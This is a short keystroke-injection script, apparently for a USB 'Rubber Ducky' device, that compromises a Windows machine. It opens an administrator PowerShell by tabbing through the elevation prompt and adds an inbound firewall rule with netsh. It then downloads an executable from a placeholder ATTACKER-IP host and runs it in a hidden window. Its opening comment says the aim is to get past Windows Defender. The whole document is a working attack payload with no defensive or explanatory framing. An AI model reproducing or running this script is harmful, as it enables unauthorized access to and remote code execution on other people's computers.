######To avoid Windows Defender, a harmless but vulerable executable is downloaded and exploited########


DELAY 3000
GUI d

###########Opens Powershell as Administrator################

DELAY 1000
GUI x
DELAY 1000

STRING a
DELAY 2500

TAB
DELAY 500
TAB
DELAY 500
ENTER

#################Opening port in Firewall####################

DELAY 500
STRING netsh advfirewall firewall add rule name="TCP Port PORT" dir=in action=allow protocol=TCP localport=PORT
DELAY 1000
ENTER

STRING cd C:\Users\Public\Downloads
ENTER
DELAY 2000

#############Downloading Program and Executing it in the background###############

STRING Invoke-WebRequest http://ATTACKER-IP:8081/Program.exe -O Program.exe
DELAY 1000
ENTER
DELAY 2500

STRING powershell.exe -WindowStyle hidden -Command .\Program.exe
ENTER






